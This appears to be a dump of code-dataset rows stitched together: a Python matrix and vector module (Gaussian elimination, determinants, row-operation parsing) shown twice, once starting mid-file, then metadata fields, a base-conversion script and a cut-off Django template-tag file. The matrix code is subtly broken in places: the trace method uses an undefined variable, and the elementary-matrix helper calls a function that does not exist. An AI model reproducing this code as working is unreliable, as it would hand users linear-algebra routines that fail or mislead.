row_ops.append(RowOp(2,r2,r,-M[r2][lead2])) M = M.pivot(r2,r,-M[r2][lead2]) # Sort the below by leading zeros again M,row_ops = get_sort(M,r+1, row_ops) return M if not get_row_ops else (M, row_ops) def RREF(self, get_row_ops = False): '''return self in reduced row echelon form, and the list of row operations that reduce it if get_row_ops = True''' def leading_zeros(row,n): return n if row==[] or row[0]!=0 else leading_zeros(row[1:],n+1) # put it in REF M, row_ops = self.REF(True) leads = [leading_zeros(row,0) for row in M] for r in range(M.m): for c in range(leads[r]+1,M.n): if c in leads: r2 = leads.index(c) row_ops.append(RowOp(2,r,r2, Frac(-M[r][c],M[r2][c]))) M = M.pivot(r,r2, Frac(-M[r][c],M[r2][c])) return M if not get_row_ops else (M, row_ops) def tr(self): '''return trace of self''' return sum([self[i][i] for i in range(n)]) def det(self): '''Return determinant of self if self is square''' m,n = self.mn() if n!=m: raise ValueError("This Matrix is not sqaure") if n == 1: return self[0][0] if n == 2: return self[0][0]*self[1][1] - self[0][1]*self[1][0] # row expansion return sum([self[0][j]*self.C(0,j) for j in range(n)]) def M(self,i,j): '''return the Minor of self at i,j(i.e. det of the matrix of self with row i and col j removed)''' return Matrix([[self[ii][jj] for jj in range(self.n) if jj != j] for ii in range(self.m) if ii!=i]).det() def C(self,i,j): '''return the cofactor of self at i,j''' return (-1)**(i+j)*self.M(i,j) def adj(self): '''return the adjoint matrix of self''' return Matrix([[self.C(j,i) for j in range(self.n)] for i in range(self.m)]) def inverse(self): '''return the inverse matrix of self if it exists''' return Frac(1,self.det()) * self.adj() def TA(self, x): '''return Matrix transformation of self*x where x is a Vector''' return self*x.col() def I(n): '''Return an n x n identity matrix''' return Matrix([[(1 if i==j else 0) for j in range(n) ] for i in range(n)]) def Elementary(n, op, *args): ''' Return elementary matrix where a row operation is performed on the identity matrix of size n. row is row number (from 1) for op to be performed on. op is op number 0-2 or 's','m','p' args following op contains either: 0/'s' (r1,r2) : r1 <-> r2 1/'m' (r1,c) : r1 <- r1*c 2/'p' (r1,r2,c) : r1 <- r1 + c*r2''' if str(op) in 'smp': op = 'smp'.find(op) if op == 0: self = I(n).swap(*args[:2]) # b is constant not row in this case if op == 1: self = I(n).scale(*args[:2]) if op == 2: self = I(n).pivot(*args) return self def ElementaryOpst(n, opst): '''Return elementary matrix where a row operation is performed on the identity matrix of size n. opst is row op string. ex "R2*-3", "R2sR3", "R2 - 3/2R3". no spaces necessary''' opst = RowOp(str(opst)) return Elementary2(n,opst.op,*opst.tuple()) class RowOp: '''Holds details about an elementary row operation to be performed on a matrix. These are descriptions corresponding to op numbers: 0 - Swap: two row numbers to indicate these rows to be interchanged (r1,r2) r1 <-> r2 1 - Scale: a target row, then a constant to multiply that row by (r1,c) r1 <- r1*c 2 - Pivot: a row number, a another row number, then a constant to add constant * second row to first (r1,r2,c) r1 <- r1 + c*r2''' def __init__(self, *args): '''args can be opst which is row op string. Examples: "R2*-3" -> multiply each entry in row to by constant -3 "R2sR3" -> switch rows 2 and 3 "R2 - 3/2R3" -> add -3/2 of each entry in row 3 to row 2 spaces in format are optional args can be op number (0-2), then r1,c or r1,r2 or r1,r2,c based on the number''' if len(args) == 1: if type(args[0]) == str: self.init_opst(args[0]) elif type(args[0]) == RowOp: self.init_opst(args[0].opst) else: args += (0,) self.op = op = args[0] self.r1 = args[1] self.r2,self.c = [(args[2],1), (None,args[2]), (args[2],args[3])][op] # assign self.opst self.reconstruct() def init_opst(self,opst): self.opst = opst self.op = op = ['s' in opst, '*' in opst, True].index(True) opst = opst.replace(' ','') r1,r2,c = None,None,0 if op == 0: r1,r2 = map(int,opst.replace('R','').split('s')) if op == 1: r1,c = opst[1:].split('*') r1 = int(r1) if '/' in c: a,b = map(int,c.split("/")) c = Frac(a,b) else: c = int(c) if op == 2: pm = '+-'[int('-' in opst)] r1 = int(opst[1:opst.find(pm)]) r2 = int(opst[opst.rfind("R")+1:]) c = opst[opst.find(pm):opst.rfind("R")] if '/' in c: a,b = map(int,c.split("/")) c = Frac(a,b) else: c = int(c+('1' if len(c)==1 else '')) self.r1 = r1 - 1 self.r2 = (None if not r2 else r2 - 1) self.c = c self.reconstruct() def __repr__(self): return self.opst def reconstruct(self): '''sets self.opst based on op,r1,r2,c values''' pm = "+-"[int(self.c < 0)] r1,r2 = self.r1+1, (None if self.r2 == None else self.r2+1) self.opst = [f"R{r1}sR{r2}", f"R{r1} * {self.c}", f"R{r1} {pm} {abs(self.c)}R{r2}"][self.op] def tuple(self): '''return op as tuple of form (r1,c,None), (r1,r2,None), or (r1,r2,c) based on self.op''' return [(self.r1,self.r2,None), (self.r1,self.c,None), (self.r1,self.r2,self.c)][self.op] def invert(self): '''Return the inverse row operation string of self''' opst = RowOp(self.opst) if opst.op == 1: opst.c = Frac(1,opst.c) if opst.op == 2: opst.c = -opst.c opst.reconstruct() return opst class Vector(list): def __init__(self, vector): # cast Vector to str if type(vector) == str: vector = list(map(Frac,vector.split())) # convert matrix of 1 col to vector if isinstance(vector[0], list): if len(vector[0]) == 1: vector = [row[0] for row in vector] else: vector = vector[0] # would be a matrix with one row super().__init__(vector) def __repr__(self): return str([str(c) for c in self]).replace("'",'') def __neg__(self): '''return -self''' return -1*self def __mul__(self, value): '''return self*value. value is a constant''' return Vector([a*value for a in self]) def __rmul__(self, value): '''return value*self. value is a constant''' return Vector([a*value for a in self]) def __add__(self, vector): '''return self+vector''' return Vector([self[i]+vector[i] for i in range(len(self))]) def __sub__(self, vector): '''return self - vector''' return self + -1*vector ## def __setitem__(self, key, value): ## '''set self[key] to value''' ## self[key] = Frac(value) def norm(self): '''return the norm (length) of self''' return sqrt(self.normsq()) def normsq(self): '''return the norm^2 of self''' return sum([v**2 for v in self]) def unit(self): '''return unit vector of self''' return (1/self.norm())*self def dot(self,vector): '''return dot product of self and vector''' return sum([self[i]*vector[i] for i in range(len(self))]) def angle(self,vector): '''return angle between two vectors in radians''' return acos( self.dot(vector) / (self.norm()*vector.norm()) ) def dangle(self,vector): '''return angle between self and vector in degrees''' return degrees(self.angle(vector)) def cross(self,vector): '''return self x vector''' M = Matrix([self,vector]) return Vector([M.remove_col(0).det(),-M.remove_col(1).det(),M.remove_col(2).det()]) def lagrange(self,vector): '''return length of self cross vector using lagrange identity''' return sqrt( self.norm()**2 * vector.norm()**2 - self.dot(vector)**2 ) def proj_len(self, vector): ''''return the length of the projection of self onto vector; proj vector self''' return (self.dot(vector)/vector.norm())#Frac(self.dot(a),a.norm()) def proj(self,vector): '''return projection of self onto vector; proj vector self''' return Vector([Frac(self.dot(vector),vector.normsq())*c for c in vector]) def col(self): '''return self as a column matrix''' return Matrix([[a] for a in self]) def row(self): '''return self as a row matrix''' return Matrix([self]) def mul_list(matrices): '''multiply each matrix in order''' M = matrices[0].copy() for E in matrices[1:]: M = M*E return M def apply_ops(M, row_ops): '''return a matrix where a list of RowOps or opst are applied to M in order''' M = M.copy() for op in row_ops: M = M.row_op(op) return M if __name__ == "__main__": #RREF A = Matrix([[0,3,-1,2,-5], [3,6,9,-3,15], [3,9,8,-1,10]]) A.REF().print() A.RREF().print() print() A = Matrix([[0,0,0,2,1,9],[0,-2,-6,2,0,2],[0,2,6,-2,2,0],[0,3,9,2,2,19]]) A.REF().print() A.RREF().print() ## x = Vector([[0,2,0]]) ## y = Vector([[0,0,3]]) ## u = Vector(x-2*y) ## v = Vector(2*x+3*y) ## print(v.norm()) ## print(u.norm()) ## angle = v.angle(u) ## print(angle) ## ## optests = ["R2-3/2R3","R2sR3","R2*-3/4"] ## for op in optests: ## op = RowOp(op) ## print(op,op.invert())
## matrix ## ## June, 2021 ## ## By <NAME> ## ''' This module contains Matrix, Vector, and RowOp classes. Matrix objects store entries as fractions and implement matrix operations. Matrix also does more like RREF function implements Gaussian elimination/row reduction to return a matrix in reduced row echelon form. Vector is a subclass of Matrix that implements vector operations. RowOp is a class that breaks down a row operation string to make performing row operations simpler. For example, if the user wants to add 3 * row 2 to row 1 of a 4x5 Matrix M, they can simply pass "R1 + 3*R2" into M.rowop() and the string will be given meaning by the RowOp class. ''' from fractions import Fraction as Frac from math import * # Some math functions for returning values in degrees def dcos(x): return cos(radians(x)) def dtan(x): return tan(radians(x)) def dsin(x): return sin(radians(x)) def dacos(x): return degrees(acos(x)) def dasin(x): return degrees(asin(x)) def datan(x): return degrees(atan(x)) class Matrix(list): '''2D matrix object implements matrix operations and functions Matrix can be initialized by passing a 2D array or a string of form "a b c\nd e f" where a-c are entries of first row and d-f are entries of second row ''' def __init__(self,matrix): super().__init__(matrix) # make each row a Matrix if self and type(self[0]) == list: for i in range(len(self)): self[i] = Matrix([Frac(a) for a in self[i]]) # initialize n,m if matrix is 2D if self and isinstance(self[0],list): self.m,self.n = self.mn() def __repr__(self): return str([[str(c) for c in row] for row in self]).replace("'",'') def __add__(self, matrix): '''Return self + matrix''' if not self.is_same_size(matrix): raise ValueError("Matrices not of compatable size") return Matrix([Matrix([self[i][j]+matrix[i][j] for j in range(len(self[0]))]) for i in range(len(self))]) def __radd__(self, matrix): '''Return matrix + self''' return matrix.__add__(self) def __neg__(self): '''Return self where each element is negated''' return Matrix([Matrix([-x for x in row]) for row in self]) def __sub__(self, matrix): '''Return self - matrix''' return self + -matrix def __rsub__(self,matrix): '''Return matrix - self''' return matrix - self def __mul__(self,value): '''return self*value (value can be matrix or constant)''' m,r = self.mn() if isinstance(value,(int,Frac)): return Matrix([Matrix([x*value for x in row]) for row in self]) r2,n = value.mn() if r != r2: raise ValueError("Matrices of incompatable sizes") return Matrix([Matrix([sum([self[i][t]*value[t][j] for t in range(r)]) for j in range(n)]) for i in range(m)]) def __rmul__(self, value): '''return value*self (value can be matrix or constant)''' if isinstance(value,(int,Frac)): return Matrix([Matrix([x*value for x in row]) for row in self]) return value.__mul__(self) def __floordiv__(self, value): '''Return self where each element x is x//value, value is int or Fraction''' return Matrix([Matrix([x//value for x in row]) for row in self]) def __div__(self, value): '''Return self where each element x is x/value, value is a constant''' return Matrix([Matrix([x/value for x in row]) for row in self]) def __pow__(self, value): '''Return self**value''' # if value is less than 0, we have to invert first, but we'll worry about this later if value > 0: M = self.copy() for i in range(value-1): M = M*self return M def print(self): '''display formatted matrix to console''' # holds format specifier for each column of self form = [max([len(str(self[i][j])) for i in range(self.m)]) for j in range(self.n)] M = [[f"{str(self[i][j]):>{form[j]}s}" for j in range(self.n)] for i in range(self.m)] print(str(M).replace('], [',']\n [').replace("'",''))#.replace(',','')) def copy(self): ''' Return a 2 level copy of self''' return Matrix([Matrix([x for x in row]) for row in self]) def is_same_size(self, matrix): '''return if self has the same number of rows and columns as matrix''' return self.mn() == matrix.mn() def mn(self): '''Return (row,columns) of self''' return len(self),len(self[0]) def remove_col(self,c): '''return self with column c removed''' return Matrix([[self[r][i] for i in range(self.n) if i != c] for r in range(self.m)]) def remove_row(self,r): '''return self with row r removed''' return Matrix([self[i] for i in range(self.m) if i != r]) # Row operations def swap(self,r1,r2): '''r1 <-> r2''' M = self.copy() M[r1],M[r2] = M[r2],M[r1] return M def scale(self,r1,c): '''r1 <- c*r1''' M = self.copy() M[r1] = c*M[r1] return M def pivot(self,r1,r2,c = 1): '''r1 <- r1 + c*r2''' m,n = self.mn() M = self.copy() M[r1] = M[r1]+c*M[r2] return M def row_op(self,opst): '''return matrix with row operation object or string opst applied to self''' opst = RowOp(str(opst)) if opst.op == 0: return self.swap(opst.r1,opst.r2) if opst.op == 1: return self.scale(opst.r1,opst.c) if opst.op == 2: return self.pivot(opst.r1,opst.r2,opst.c) def T(self): '''Return transpose of self''' return Matrix([[self[j][i] for j in range(len(self))] for i in range(len(self[0]))]) def REF(self, get_row_ops = False): '''Return self in a row echelon form, and the list of row operations that reduce it if get_row_ops = True.''' # Sort rows by least amount of leading zeros def leading_zeros(row,n): '''return the number of leading zeros in a list/Vector''' return n if row==[] or row[0]!=0 else leading_zeros(row[1:],n+1) def get_sort(M,start=0, ops = []): '''return M (with rows sorted by number of leading zeros) and row ops''' if start == M.m: return (M, ops) M = M.copy() leads = [leading_zeros(row,0) for row in M] r2 = leads.index(min(leads[start+1:]+[leads[start]]),start) if r2 != start: M[start],M[r2] = M[r2],M[start] ops.append(RowOp(0,start,r2)) return get_sort(M, start+1, ops) ## return Matrix(M[:start] + sorted(M[start:],key = lambda row: leading_zeros(row,0))) # if row_ops not involved M, row_ops = get_sort(self) for r in range(M.m): lead = leading_zeros(M[r],0) #where the current row's leading 1 will be # if zero row, no ops necessary if lead == M.n: break # Transform row so lead is 1 if M[r][lead] != 1: row_ops.append(RowOp(1,r,Frac(1,M[r][lead]))) M = M.scale(r,Frac(1,M[r][lead])) # Remove entries below for r2 in range(r+1,M.m): if M[r2][lead] == 0: break lead2 = leading_zeros(M[r2],0) row_ops.append(RowOp(2,r2,r,-M[r2][lead2])) M = M.pivot(r2,r,-M[r2][lead2]) # Sort the below by leading zeros again M,row_ops = get_sort(M,r+1, row_ops) return M if not get_row_ops else (M, row_ops) def RREF(self, get_row_ops = False): '''return self in reduced row echelon form, and the list of row operations that reduce it if get_row_ops = True''' def leading_zeros(row,n): return n if row==[] or row[0]!=0 else leading_zeros(row[1:],n+1) # put it in REF M, row_ops = self.REF(True) leads = [leading_zeros(row,0) for row in M] for r in range(M.m): for c in range(leads[r]+1,M.n): if c in leads: r2 = leads.index(c) row_ops.append(RowOp(2,r,r2, Frac(-M[r][c],M[r2][c]))) M = M.pivot(r,r2, Frac(-M[r][c],M[r2][c])) return M if not get_row_ops else (M, row_ops) def tr(self): '''return trace of self''' return sum([self[i][i] for i in range(n)]) def det(self): '''Return determinant of self if self is square''' m,n = self.mn() if n!=m: raise ValueError("This Matrix is not sqaure") if n == 1: return self[0][0] if n == 2: return self[0][0]*self[1][1] - self[0][1]*self[1][0] # row expansion return sum([self[0][j]*self.C(0,j) for j in range(n)]) def M(self,i,j): '''return the Minor of self at i,j(i.e. det of the matrix of self with row i and col j removed)''' return Matrix([[self[ii][jj] for jj in range(self.n) if jj != j] for ii in range(self.m) if ii!=i]).det() def C(self,i,j): '''return the cofactor of self at i,j''' return (-1)**(i+j)*self.M(i,j) def adj(self): '''return the adjoint matrix of self''' return Matrix([[self.C(j,i) for j in range(self.n)] for i in range(self.m)]) def inverse(self): '''return the inverse matrix of self if it exists''' return Frac(1,self.det()) * self.adj() def TA(self, x): '''return Matrix transformation of self*x where x is a Vector''' return self*x.col() def I(n): '''Return an n x n identity matrix''' return Matrix([[(1 if i==j else 0) for j in range(n) ] for i in range(n)]) def Elementary(n, op, *args): ''' Return elementary matrix where a row operation is performed on the identity matrix of size n. row is row number (from 1) for op to be performed on. op is op number 0-2 or 's','m','p' args following op contains either: 0/'s' (r1,r2) : r1 <-> r2 1/'m' (r1,c) : r1 <- r1*c 2/'p' (r1,r2,c) : r1 <- r1 + c*r2''' if str(op) in 'smp': op = 'smp'.find(op) if op == 0: self = I(n).swap(*args[:2]) # b is constant not row in this case if op == 1: self = I(n).scale(*args[:2]) if op == 2: self = I(n).pivot(*args) return self def ElementaryOpst(n, opst): '''Return elementary matrix where a row operation is performed on the identity matrix of size n. opst is row op string. ex "R2*-3", "R2sR3", "R2 - 3/2R3". no spaces necessary''' opst = RowOp(str(opst)) return Elementary2(n,opst.op,*opst.tuple()) class RowOp: '''Holds details about an elementary row operation to be performed on a matrix. These are descriptions corresponding to op numbers: 0 - Swap: two row numbers to indicate these rows to be interchanged (r1,r2) r1 <-> r2 1 - Scale: a target row, then a constant to multiply that row by (r1,c) r1 <- r1*c 2 - Pivot: a row number, a another row number, then a constant to add constant * second row to first (r1,r2,c) r1 <- r1 + c*r2''' def __init__(self, *args): '''args can be opst which is row op string. Examples: "R2*-3" -> multiply each entry in row to by constant -3 "R2sR3" -> switch rows 2 and 3 "R2 - 3/2R3" -> add -3/2 of each entry in row 3 to row 2 spaces in format are optional args can be op number (0-2), then r1,c or r1,r2 or r1,r2,c based on the number''' if len(args) == 1: if type(args[0]) == str: self.init_opst(args[0]) elif type(args[0]) == RowOp: self.init_opst(args[0].opst) else: args += (0,) self.op = op = args[0] self.r1 = args[1] self.r2,self.c = [(args[2],1), (None,args[2]), (args[2],args[3])][op] # assign self.opst self.reconstruct() def init_opst(self,opst): self.opst = opst self.op = op = ['s' in opst, '*' in opst, True].index(True) opst = opst.replace(' ','') r1,r2,c = None,None,0 if op == 0: r1,r2 = map(int,opst.replace('R','').split('s')) if op == 1: r1,c = opst[1:].split('*') r1 = int(r1) if '/' in c: a,b = map(int,c.split("/")) c = Frac(a,b) else: c = int(c) if op == 2: pm = '+-'[int('-' in opst)] r1 = int(opst[1:opst.find(pm)]) r2 = int(opst[opst.rfind("R")+1:]) c = opst[opst.find(pm):opst.rfind("R")] if '/' in c: a,b = map(int,c.split("/")) c = Frac(a,b) else: c = int(c+('1' if len(c)==1 else '')) self.r1 = r1 - 1 self.r2 = (None if not r2 else r2 - 1) self.c = c self.reconstruct() def __repr__(self): return self.opst def reconstruct(self): '''sets self.opst based on op,r1,r2,c values''' pm = "+-"[int(self.c < 0)] r1,r2 = self.r1+1, (None if self.r2 == None else self.r2+1) self.opst = [f"R{r1}sR{r2}", f"R{r1} * {self.c}", f"R{r1} {pm} {abs(self.c)}R{r2}"][self.op] def tuple(self): '''return op as tuple of form (r1,c,None), (r1,r2,None), or (r1,r2,c) based on self.op''' return [(self.r1,self.r2,None), (self.r1,self.c,None), (self.r1,self.r2,self.c)][self.op] def invert(self): '''Return the inverse row operation string of self''' opst = RowOp(self.opst) if opst.op == 1: opst.c = Frac(1,opst.c) if opst.op == 2: opst.c = -opst.c opst.reconstruct() return opst class Vector(list): def __init__(self, vector): # cast Vector to str if type(vector) == str: vector = list(map(Frac,vector.split())) # convert matrix of 1 col to vector if isinstance(vector[0], list): if len(vector[0]) == 1: vector = [row[0] for row in vector] else: vector = vector[0] # would be a matrix with one row super().__init__(vector) def __repr__(self): return str([str(c) for c in self]).replace("'",'') def __neg__(self): '''return -self''' return -1*self def __mul__(self, value): '''return self*value. value is a constant''' return Vector([a*value for a in self]) def __rmul__(self, value): '''return value*self. value is a constant''' return Vector([a*value for a in self]) def __add__(self, vector): '''return self+vector''' return Vector([self[i]+vector[i] for i in range(len(self))]) def __sub__(self, vector): '''return self - vector''' return self + -1*vector ## def __setitem__(self, key, value): ## '''set self[key] to value''' ## self[key] = Frac(value) def norm(self): '''return the norm (length) of self''' return sqrt(self.normsq()) def normsq(self): '''return the norm^2 of self''' return sum([v**2 for v in self]) def unit(self): '''return unit vector of self''' return (1/self.norm())*self def dot(self,vector): '''return dot product of self and vector''' return sum([self[i]*vector[i] for i in range(len(self))]) def angle(self,vector): '''return angle between two vectors in radians''' return acos( self.dot(vector) / (self.norm()*vector.norm()) ) def dangle(self,vector): '''return angle between self and vector in degrees''' return degrees(self.angle(vector)) def cross(self,vector): '''return self x vector''' M = Matrix([self,vector]) return Vector([M.remove_col(0).det(),-M.remove_col(1).det(),M.remove_col(2).det()]) def lagrange(self,vector): '''return length of self cross vector using lagrange identity''' return sqrt( self.norm()**2 * vector.norm()**2 - self.dot(vector)**2 ) def proj_len(self, vector): ''''return the length of the projection of self onto vector; proj vector self''' return (self.dot(vector)/vector.norm())#Frac(self.dot(a),a.norm()) def proj(self,vector): '''return projection of self onto vector; proj vector self''' return Vector([Frac(self.dot(vector),vector.normsq())*c for c in vector]) def col(self): '''return self as a column matrix''' return Matrix([[a] for a in self]) def row(self): '''return self as a row matrix''' return Matrix([self]) def mul_list(matrices): '''multiply each matrix in order''' M = matrices[0].copy() for E in matrices[1:]: M = M*E return M def apply_ops(M, row_ops): '''return a matrix where a list of RowOps or opst are applied to M in order''' M = M.copy() for op in row_ops: M = M.row_op(op) return M if __name__ == "__main__": #RREF A = Matrix([[0,3,-1,2,-5], [3,6,9,-3,15], [3,9,8,-1,10]]) A.REF().print() A.RREF().print() print() A = Matrix([[0,0,0,2,1,9],[0,-2,-6,2,0,2],[0,2,6,-2,2,0],[0,3,9,2,2,19]]) A.REF().print() A.RREF().print() ## x = Vector([[0,2,0]]) ## y = Vector([[0,0,3]]) ## u = Vector(x-2*y) ## v = Vector(2*x+3*y) ## print(v.norm()) ## print(u.norm()) ## angle = v.angle(u) ## print(angle) ## ## optests = ["R2-3/2R3","R2sR3","R2*-3/4"] ## for op in optests: ## op = RowOp(op) ## print(op,op.invert())
en
0.757431
## matrix ## ## June, 2021 ## ## By <NAME> ## This module contains Matrix, Vector, and RowOp classes. Matrix objects store entries as fractions and implement matrix operations. Matrix also does more like RREF function implements Gaussian elimination/row reduction to return a matrix in reduced row echelon form. Vector is a subclass of Matrix that implements vector operations. RowOp is a class that breaks down a row operation string to make performing row operations simpler. For example, if the user wants to add 3 * row 2 to row 1 of a 4x5 Matrix M, they can simply pass "R1 + 3*R2" into M.rowop() and the string will be given meaning by the RowOp class. # Some math functions for returning values in degrees 2D matrix object implements matrix operations and functions Matrix can be initialized by passing a 2D array or a string of form "a b c\nd e f" where a-c are entries of first row and d-f are entries of second row # make each row a Matrix # initialize n,m if matrix is 2D Return self + matrix Return matrix + self Return self where each element is negated Return self - matrix Return matrix - self return self*value (value can be matrix or constant) return value*self (value can be matrix or constant) Return self where each element x is x//value, value is int or Fraction Return self where each element x is x/value, value is a constant Return self**value # if value is less than 0, we have to invert first, but we'll worry about this later display formatted matrix to console # holds format specifier for each column of self #.replace(',','')) Return a 2 level copy of self return if self has the same number of rows and columns as matrix Return (row,columns) of self return self with column c removed return self with row r removed # Row operations r1 <-> r2 r1 <- c*r1 r1 <- r1 + c*r2 return matrix with row operation object or string opst applied to self Return transpose of self Return self in a row echelon form, and the list of row operations that reduce it if get_row_ops = True. # Sort rows by least amount of leading zeros return the number of leading zeros in a list/Vector return M (with rows sorted by number of leading zeros) and row ops ## return Matrix(M[:start] + sorted(M[start:],key = lambda row: leading_zeros(row,0))) # if row_ops not involved #where the current row's leading 1 will be # if zero row, no ops necessary # Transform row so lead is 1 # Remove entries below # Sort the below by leading zeros again return self in reduced row echelon form, and the list of row operations that reduce it if get_row_ops = True # put it in REF return trace of self Return determinant of self if self is square # row expansion return the Minor of self at i,j(i.e. det of the matrix of self with row i and col j removed) return the cofactor of self at i,j return the adjoint matrix of self return the inverse matrix of self if it exists return Matrix transformation of self*x where x is a Vector Return an n x n identity matrix Return elementary matrix where a row operation is performed on the identity matrix of size n. row is row number (from 1) for op to be performed on. op is op number 0-2 or 's','m','p' args following op contains either: 0/'s' (r1,r2) : r1 <-> r2 1/'m' (r1,c) : r1 <- r1*c 2/'p' (r1,r2,c) : r1 <- r1 + c*r2 # b is constant not row in this case Return elementary matrix where a row operation is performed on the identity matrix of size n. opst is row op string. ex "R2*-3", "R2sR3", "R2 - 3/2R3". no spaces necessary Holds details about an elementary row operation to be performed on a matrix. These are descriptions corresponding to op numbers: 0 - Swap: two row numbers to indicate these rows to be interchanged (r1,r2) r1 <-> r2 1 - Scale: a target row, then a constant to multiply that row by (r1,c) r1 <- r1*c 2 - Pivot: a row number, a another row number, then a constant to add constant * second row to first (r1,r2,c) r1 <- r1 + c*r2 args can be opst which is row op string. Examples: "R2*-3" -> multiply each entry in row to by constant -3 "R2sR3" -> switch rows 2 and 3 "R2 - 3/2R3" -> add -3/2 of each entry in row 3 to row 2 spaces in format are optional args can be op number (0-2), then r1,c or r1,r2 or r1,r2,c based on the number # assign self.opst sets self.opst based on op,r1,r2,c values return op as tuple of form (r1,c,None), (r1,r2,None), or (r1,r2,c) based on self.op Return the inverse row operation string of self # cast Vector to str # convert matrix of 1 col to vector # would be a matrix with one row return -self return self*value. value is a constant return value*self. value is a constant return self+vector return self - vector ## def __setitem__(self, key, value): ## '''set self[key] to value''' ## self[key] = Frac(value) return the norm (length) of self return the norm^2 of self return unit vector of self return dot product of self and vector return angle between two vectors in radians return angle between self and vector in degrees return self x vector return length of self cross vector using lagrange identity 'return the length of the projection of self onto vector; proj vector self #Frac(self.dot(a),a.norm()) return projection of self onto vector; proj vector self return self as a column matrix return self as a row matrix multiply each matrix in order return a matrix where a list of RowOps or opst are applied to M in order #RREF ## x = Vector([[0,2,0]]) ## y = Vector([[0,0,3]]) ## u = Vector(x-2*y) ## v = Vector(2*x+3*y) ## print(v.norm()) ## print(u.norm()) ## angle = v.angle(u) ## print(angle) ## ## optests = ["R2-3/2R3","R2sR3","R2*-3/4"] ## for op in optests: ## op = RowOp(op) ## print(op,op.invert())
3.966724
4
07_RSI/ch03/tostr.py
zzz0072/Python_Exercises
0
6623649
<gh_stars>0 #!/usr/bin/env python3 def toStr(num, base): digitStr = "0123456789ABCDEF" if num < base: return digitStr[num] else: return toStr(num // base, base) + digitStr[num % base] if __name__ == "__main__": print(toStr(1200, 10)) print(toStr(255, 16))
#!/usr/bin/env python3 def toStr(num, base): digitStr = "0123456789ABCDEF" if num < base: return digitStr[num] else: return toStr(num // base, base) + digitStr[num % base] if __name__ == "__main__": print(toStr(1200, 10)) print(toStr(255, 16))
fr
0.221828
#!/usr/bin/env python3
3.819789
4
common/templatetags/tools.py
riderflo85/common-framework
0
6623650
# coding: utf-8 from django.http import QueryDict from django.template import Library from django.utils.formats import localize register = Library() @register.filter(name='meta') def filter_meta(instance, key): """ Récupération d'une métadonnée sur une instance :param key: Clé :return: Valeur """ if hasattr(instance, 'get_metadata'): return instance.get_metadata(key) return None @register.filter(name='parsedate') def filter_parsedate(value, options=''): """ Parse une date ou un datetime dans n'importe quel format :param value: Date ou datetime au format texte :param options: Options de parsing (au format query string) :return: Date ou datetime """ from common.utils import parsedate options = QueryDict(options) return parsedate(value, **options) @register.filter(name='get') def filter_get(value, key): """ Permet de récupérer une valeur depuis un objet quelconque :param value: Objet :param key: Clé ou index :return: Valeur """ try: if isinstance(value, dict): return value.get(key) or value.get(int(key)) elif isinstance(value, (list, tuple)): return value[int(key)] else: return getattr(value, key, None) except ValueError: return None @register.filter(name='localize') def filter_localize(value, use_l10n=None): """ Localise une valeur brute :param value: Valeur :param use_l10n: Force ou non la localisation :return: Valeur localisée (si possible) """ return localize(value, use_l10n=use_l10n) or value @register.simple_tag(name='query', takes_context=True) def tag_query(context, queryset, save='', **kwargs): """ Permet de faire des opérations complémentaires sur un QuerySet :param context: Contexte local :param queryset: QuerySet :param save: Nom du contexte qui contiendra le nouveau QuerySet :param kwargs: Options de filtre/tri/etc... :return: Rien """ from common.api.utils import url_value, AGGREGATES from django.db.models import F, QuerySet if not isinstance(queryset, QuerySet): return queryset # Fonction de récupération des données depuis les paramètres def get(name): return kwargs.get(name, '').replace('.', '__').replace(' ', '') reserved_keywords = ( 'filters', 'fields', 'order_by', 'group_by', 'distinct', 'select_related', 'prefetch_related', 'limit', ) + tuple(AGGREGATES.keys()) # Filtres (dans une fonction pour être appelé par les aggregations sans group_by) def do_filter(queryset): filters = {} excludes = {} for key, value in kwargs.items(): if key in reserved_keywords: continue key = key.replace('.', '__') if isinstance(value, str) and value.startswith('(') and value.endswith(')'): value = F(value[1:-1]) if key.startswith('_'): key = key[1:] excludes[key] = url_value(key, value) else: key = key.strip() filters[key] = url_value(key, value) if filters: queryset = queryset.filter(**filters) if excludes: queryset = queryset.exclude(**excludes) # Filtres génériques others = kwargs.get('filters', None) if others: from common.api.utils import parse_filters queryset = queryset.filter(parse_filters(others)) return queryset # Jointures select_related = get('select_related') if select_related: queryset = queryset.select_related(*select_related.split(',')) prefetch_related = get('prefetch_related') if prefetch_related: queryset = queryset.prefetch_related(*prefetch_related.split(',')) # Aggregations aggregations = {} for aggregate, function in AGGREGATES.items(): for field in kwargs.get(aggregate, '').split(','): if not field: continue distinct = field.startswith(' ') field = field.strip().replace('.', '__') aggregations[field + '_' + aggregate] = function(field, distinct=distinct) group_by = get('group_by') if group_by: _queryset = queryset.values(*group_by.split(',')) if aggregations: _queryset = _queryset.annotate(**aggregations) else: _queryset = _queryset.distinct() queryset = _queryset elif aggregations: queryset = do_filter(queryset) # Filtres éventuels return queryset.aggregate(**aggregations) # Filtres queryset = do_filter(queryset) # Extraction de champs spécifiques fields = get('fields') if fields: # Supprime la récupération des relations queryset = queryset.select_related(None).prefetch_related(None) # Champs spécifiques relateds = set() field_names = set() for field in fields.split(','): if not field: continue field_names.add(field) *related, field_name = field.split('__') if related: relateds.add('__'.join(related)) if relateds: queryset = queryset.select_related(*relateds) if field_names: queryset = queryset.values_list(*field_names, named=True) # Tris order_by = get('order_by') if order_by: _queryset = queryset.order_by(*order_by.split(',')) str(_queryset.query) # Force SQL evaluation to retrieve exception queryset = _queryset # Distinct distinct = get('distinct') if distinct: if distinct is True: distincts = () else: distincts = distinct.split(',') queryset = queryset.distinct(*distincts) # Limite limit = get('limit') if limit: limit = [int(l) for l in limit.split(',')] limit_inf, limit_sup = (0, limit[0]) if len(limit) == 1 else limit[:2] queryset = queryset[limit_inf:limit_sup] context[save] = queryset return ''
# coding: utf-8 from django.http import QueryDict from django.template import Library from django.utils.formats import localize register = Library() @register.filter(name='meta') def filter_meta(instance, key): """ Récupération d'une métadonnée sur une instance :param key: Clé :return: Valeur """ if hasattr(instance, 'get_metadata'): return instance.get_metadata(key) return None @register.filter(name='parsedate') def filter_parsedate(value, options=''): """ Parse une date ou un datetime dans n'importe quel format :param value: Date ou datetime au format texte :param options: Options de parsing (au format query string) :return: Date ou datetime """ from common.utils import parsedate options = QueryDict(options) return parsedate(value, **options) @register.filter(name='get') def filter_get(value, key): """ Permet de récupérer une valeur depuis un objet quelconque :param value: Objet :param key: Clé ou index :return: Valeur """ try: if isinstance(value, dict): return value.get(key) or value.get(int(key)) elif isinstance(value, (list, tuple)): return value[int(key)] else: return getattr(value, key, None) except ValueError: return None @register.filter(name='localize') def filter_localize(value, use_l10n=None): """ Localise une valeur brute :param value: Valeur :param use_l10n: 